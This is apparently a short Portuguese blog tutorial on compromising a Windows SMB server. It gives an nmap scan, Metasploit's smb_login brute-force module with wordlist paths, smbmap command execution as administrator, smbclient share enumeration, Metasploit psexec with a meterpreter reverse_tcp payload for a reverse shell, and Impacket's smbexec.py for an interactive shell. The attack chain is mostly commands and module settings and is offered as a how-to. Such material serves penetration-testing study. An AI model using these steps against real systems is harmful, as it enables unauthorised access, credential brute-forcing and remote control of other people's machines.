SMB Exploit com Metasploit e Impacket

Como explorar o protocolo SMB em um servidor Windows usando  o Metasploit? 

NMAP Geral 

nmap -Pn -sV [IP]



Brute-Force com Metasploit 

Módulo: auxiliary/scanner/smb/smb_login
Wordlists:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt


Credencial identificada 


Execução de comando com SMBMap 

smbmap -H [IP] -u administrator -p [senha] -x '[comando]'



SMBClient Enumera Compartilhamentos 

smbclient -L [IP] -U administrator



PSExec Metasploit para Reverse Shell

Módulo: exploit/windows/smb/psexec
Payload: windows/meterpreter/reverse_tcp


Conexão reversa estabelecida



Como explorar o protocolo SMB em um servidor Windows usando  o Impacket?

O impacket possui diversos scripts em python para explorar o protocolo SMB. O script psexec.py estabelece uma shell interativa, conforme mostrado abaixo. 

Geralmente a localização dos scripts do Impacket é /opt/impacket/examples

python3 smbexec.py administrator@[IP]

Conexão estabelecida




Comentários

Postagens mais visitadas